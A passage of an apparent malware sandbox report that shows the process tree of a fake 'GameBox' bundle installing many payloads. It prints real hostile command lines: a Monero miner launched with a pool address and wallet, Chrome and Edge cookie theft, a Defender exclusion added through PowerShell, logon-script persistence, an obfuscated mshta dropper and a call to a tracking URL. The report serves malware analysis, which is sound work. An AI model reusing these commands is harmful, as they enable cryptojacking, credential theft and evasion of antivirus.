                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /im runvd.exe /f
                                                                              5⤵
                                                                              • Kills process with taskkill
                                                                              PID:5184
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout /t 6
                                                                              5⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:2520
                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          PID:4752
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-V3N0L.tmp\Stats.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-V3N0L.tmp\Stats.tmp" /SL5="$202F6,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            PID:4184
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-3QLI2.tmp\builder.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-3QLI2.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:5912
                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                          3⤵
                                                                            PID:4156
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-LRH6E.tmp\Inlog.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-LRH6E.tmp\Inlog.tmp" /SL5="$20252,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                              4⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:2932
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-E6ECN.tmp\Setup.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-E6ECN.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:7048
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-79SEV.tmp\Setup.tmp
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-79SEV.tmp\Setup.tmp" /SL5="$204BC,17344747,721408,C:\Users\Admin\AppData\Local\Temp\is-E6ECN.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                  6⤵
                                                                                  • Loads dropped DLL
                                                                                  • Drops file in Program Files directory
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  PID:7100
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-E10VI.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                    7⤵
                                                                                      PID:5908
                                                                                      • C:\Windows\SysWOW64\expand.exe
                                                                                        expand C:\Users\Admin\AppData\Local\Temp\is-E10VI.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                        8⤵
                                                                                        • Drops file in Windows directory
                                                                                        PID:7968
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                      7⤵
                                                                                        PID:364
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                          8⤵
                                                                                            PID:1136
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-E10VI.tmp\{app}\vdi_compiler.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-E10VI.tmp\{app}\vdi_compiler"
                                                                                          7⤵
                                                                                            PID:9108
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                            7⤵
                                                                                              PID:8396
                                                                                            • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                              "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                              7⤵
                                                                                                PID:1364
                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2140
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-7TH32.tmp\WEATHER Manager.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-7TH32.tmp\WEATHER Manager.tmp" /SL5="$401DE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          PID:5488
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-TIFON.tmp\Setup.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-TIFON.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                            5⤵
                                                                                            • Loads dropped DLL
                                                                                            • Modifies system certificate store
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            PID:8160
                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-TIFON.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-TIFON.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629548205 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                              6⤵
                                                                                                PID:8988
                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                          3⤵
                                                                                            PID:5264
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-LG9EF.tmp\MediaBurner2.tmp
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-LG9EF.tmp\MediaBurner2.tmp" /SL5="$20374,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              PID:5524
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-F3RD3.tmp\ultradumnibour.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-F3RD3.tmp\ultradumnibour.exe" /S /UID=burnerch2
                                                                                                5⤵
                                                                                                • Drops file in Drivers directory
                                                                                                • Executes dropped EXE
                                                                                                • Adds Run key to start application
                                                                                                • Drops file in Program Files directory
                                                                                                PID:6196
                                                                                                • C:\Program Files\Mozilla Firefox\WBPNILULQI\ultramediaburner.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\WBPNILULQI\ultramediaburner.exe" /VERYSILENT
                                                                                                  6⤵
                                                                                                    PID:636
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-RSAUS.tmp\ultramediaburner.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-RSAUS.tmp\ultramediaburner.tmp" /SL5="$206D2,281924,62464,C:\Program Files\Mozilla Firefox\WBPNILULQI\ultramediaburner.exe" /VERYSILENT
                                                                                                      7⤵
                                                                                                      • Drops file in Program Files directory
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      PID:7920
                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                        8⤵
                                                                                                          PID:4888
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1a-5cd27-d88-f43b7-4af9148d3deda\Sorefaeqigi.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1a-5cd27-d88-f43b7-4af9148d3deda\Sorefaeqigi.exe"
                                                                                                      6⤵
                                                                                                        PID:7560
                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                          dw20.exe -x -s 2168
                                                                                                          7⤵
                                                                                                            PID:8596
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1f-91ff4-35a-623bc-497bf2b8e70ee\Muwaroqube.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\1f-91ff4-35a-623bc-497bf2b8e70ee\Muwaroqube.exe"
                                                                                                          6⤵
                                                                                                            PID:2400
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oi0wejkk.wy0\GcleanerEU.exe /eufive & exit
                                                                                                              7⤵
                                                                                                                PID:9092
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\oi0wejkk.wy0\GcleanerEU.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\oi0wejkk.wy0\GcleanerEU.exe /eufive
                                                                                                                  8⤵
                                                                                                                    PID:6156
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ippbkgen.m5g\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                  7⤵
                                                                                                                    PID:8540
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ippbkgen.m5g\installer.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\ippbkgen.m5g\installer.exe /qn CAMPAIGN="654"
                                                                                                                      8⤵
                                                                                                                        PID:9200
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sfxies2r.kgs\ufgaa.exe & exit
                                                                                                                      7⤵
                                                                                                                        PID:4692
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n0ctrhbr.znd\anyname.exe & exit
                                                                                                                        7⤵
                                                                                                                          PID:7848
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\n0ctrhbr.znd\anyname.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\n0ctrhbr.znd\anyname.exe
                                                                                                                            8⤵
                                                                                                                              PID:7060
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\n0ctrhbr.znd\anyname.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\n0ctrhbr.znd\anyname.exe" -q
                                                                                                                                9⤵
                                                                                                                                  PID:7456
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2l3qdmv3.lvp\gcleaner.exe /mixfive & exit
                                                                                                                              7⤵
                                                                                                                                PID:8828
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2l3qdmv3.lvp\gcleaner.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\2l3qdmv3.lvp\gcleaner.exe /mixfive
                                                                                                                                  8⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:4156
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jsxene0r.mzp\autosubplayer.exe /S & exit
                                                                                                                                7⤵
                                                                                                                                  PID:7656
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    8⤵
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:7212
                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                          3⤵
                                                                                                                            PID:5348
                                                                                                                            • C:\Users\Admin\AppData\Roaming\2678844.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\2678844.exe"
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:6216
                                                                                                                            • C:\Users\Admin\AppData\Roaming\5305094.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\5305094.exe"
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious behavior: SetClipboardViewer
                                                                                                                              PID:6268
                                                                                                                            • C:\Users\Admin\AppData\Roaming\5444873.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\5444873.exe"
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:6304
                                                                                                                            • C:\Users\Admin\AppData\Roaming\5165942.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\5165942.exe"
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:6352
                                                                                                                            • C:\Users\Admin\AppData\Roaming\2714212.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\2714212.exe"
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:6368
                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4856
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\tmp8F3C_tmp.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\tmp8F3C_tmp.exe"
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:6700
                                                                                                                              • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                "C:\Windows\System32\dllhost.exe"
                                                                                                                                5⤵
                                                                                                                                  PID:7036
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                  5⤵
                                                                                                                                    PID:7792
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      cmd
                                                                                                                                      6⤵
                                                                                                                                        PID:4356
                                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                          findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                          7⤵
                                                                                                                                            PID:6172
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                            Esplorarne.exe.com i
                                                                                                                                            7⤵
                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                            PID:5928
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                              8⤵
                                                                                                                                              • Drops startup file
                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                              PID:5108
                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                            ping RJMQBVDN -n 30
                                                                                                                                            7⤵
                                                                                                                                            • Runs ping.exe
                                                                                                                                            PID:8176
                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Checks computer location settings
                                                                                                                                    PID:5544
                                                                                                                                    • C:\Users\Admin\Documents\0m1e4lek1ZNtxfpJy3CITdCZ.exe
                                                                                                                                      "C:\Users\Admin\Documents\0m1e4lek1ZNtxfpJy3CITdCZ.exe"
                                                                                                                                      4⤵
                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                      PID:5192
                                                                                                                                    • C:\Users\Admin\Documents\1KH45mHE_u2GOeIV_xy21fm5.exe
                                                                                                                                      "C:\Users\Admin\Documents\1KH45mHE_u2GOeIV_xy21fm5.exe"
                                                                                                                                      4⤵
                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                      PID:6312
                                                                                                                                    • C:\Users\Admin\Documents\WQswv0cCgi3ik686ZmpxvyMV.exe
                                                                                                                                      "C:\Users\Admin\Documents\WQswv0cCgi3ik686ZmpxvyMV.exe"
                                                                                                                                      4⤵
                                                                                                                                        PID:6300
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\7684538.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\7684538.exe"
                                                                                                                                          5⤵
                                                                                                                                            PID:5472
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\6053392.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\6053392.exe"
                                                                                                                                            5⤵
                                                                                                                                            • Suspicious behavior: SetClipboardViewer
                                                                                                                                            PID:5768
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\5774460.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\5774460.exe"
                                                                                                                                            5⤵
                                                                                                                                              PID:7020
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\8618485.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\8618485.exe"
                                                                                                                                              5⤵
                                                                                                                                                PID:5588
                                                                                                                                            • C:\Users\Admin\Documents\s3VBj3IYtFylYg1_2aOHyi5c.exe
                                                                                                                                              "C:\Users\Admin\Documents\s3VBj3IYtFylYg1_2aOHyi5c.exe"
                                                                                                                                              4⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:5348
                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\S3VBJ3~1.DLL,s C:\Users\Admin\DOCUME~1\S3VBJ3~1.EXE
                                                                                                                                                5⤵
                                                                                                                                                  PID:7940
                                                                                                                                                  • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                    C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\S3VBJ3~1.DLL,jztUQzU0Tw==
                                                                                                                                                    6⤵
                                                                                                                                                      PID:6536
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\S3VBJ3~1.DLL
                                                                                                                                                        7⤵
                                                                                                                                                          PID:4740
                                                                                                                                                  • C:\Users\Admin\Documents\_hja5kagU6vcFQQU73Zz5urm.exe
                                                                                                                                                    "C:\Users\Admin\Documents\_hja5kagU6vcFQQU73Zz5urm.exe"
                                                                                                                                                    4⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:7080
                                                                                                                                                  • C:\Users\Admin\Documents\yDRVDXWRi92UZa7_Nmua1CFN.exe
                                                                                                                                                    "C:\Users\Admin\Documents\yDRVDXWRi92UZa7_Nmua1CFN.exe"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:4228
                                                                                                                                                    • C:\Users\Admin\Documents\eFVkc3uXMi_1qQWcg4LqnvUt.exe
                                                                                                                                                      "C:\Users\Admin\Documents\eFVkc3uXMi_1qQWcg4LqnvUt.exe"
                                                                                                                                                      4⤵
                                                                                                                                                        PID:7248
                                                                                                                                                      • C:\Users\Admin\Documents\iLlFH5_HZBywa2wqURGkywbe.exe
                                                                                                                                                        "C:\Users\Admin\Documents\iLlFH5_HZBywa2wqURGkywbe.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        PID:7228
                                                                                                                                                      • C:\Users\Admin\Documents\JAs8oV9Iga7ztkUl7quskQ3B.exe
                                                                                                                                                        "C:\Users\Admin\Documents\JAs8oV9Iga7ztkUl7quskQ3B.exe"
                                                                                                                                                        4⤵
                                                                                                                                                          PID:7220
                                                                                                                                                          • C:\Users\Admin\Documents\JAs8oV9Iga7ztkUl7quskQ3B.exe
                                                                                                                                                            "C:\Users\Admin\Documents\JAs8oV9Iga7ztkUl7quskQ3B.exe" -q
                                                                                                                                                            5⤵
                                                                                                                                                              PID:6276
                                                                                                                                                          • C:\Users\Admin\Documents\0InLZk5hR7Ibw1hKw7IQXwCB.exe
                                                                                                                                                            "C:\Users\Admin\Documents\0InLZk5hR7Ibw1hKw7IQXwCB.exe"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:7212
                                                                                                                                                              • C:\Users\Admin\Documents\0InLZk5hR7Ibw1hKw7IQXwCB.exe
                                                                                                                                                                C:\Users\Admin\Documents\0InLZk5hR7Ibw1hKw7IQXwCB.exe
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:7684
                                                                                                                                                              • C:\Users\Admin\Documents\AacWrXiKE3KJC4761BnH4Aks.exe
                                                                                                                                                                "C:\Users\Admin\Documents\AacWrXiKE3KJC4761BnH4Aks.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                PID:7204
                                                                                                                                                              • C:\Users\Admin\Documents\4rscTEVgYoDnefOqCrkM4_FB.exe
                                                                                                                                                                "C:\Users\Admin\Documents\4rscTEVgYoDnefOqCrkM4_FB.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                PID:7196
                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                  "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:7580
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:7652
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:8336
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:7584
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:3288
                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:4176
                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:5740
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:8420
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:8476
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:9188
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:7608
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:7608
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:6588
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:7428
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:9180
                                                                                                                                                                                            • C:\Users\Admin\Documents\lb5kyYz1l6lXrh06GwFJJdvz.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\lb5kyYz1l6lXrh06GwFJJdvz.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:7188
                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\lb5kyYz1l6lXrh06GwFJJdvz.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\lb5kyYz1l6lXrh06GwFJJdvz.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:5864
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
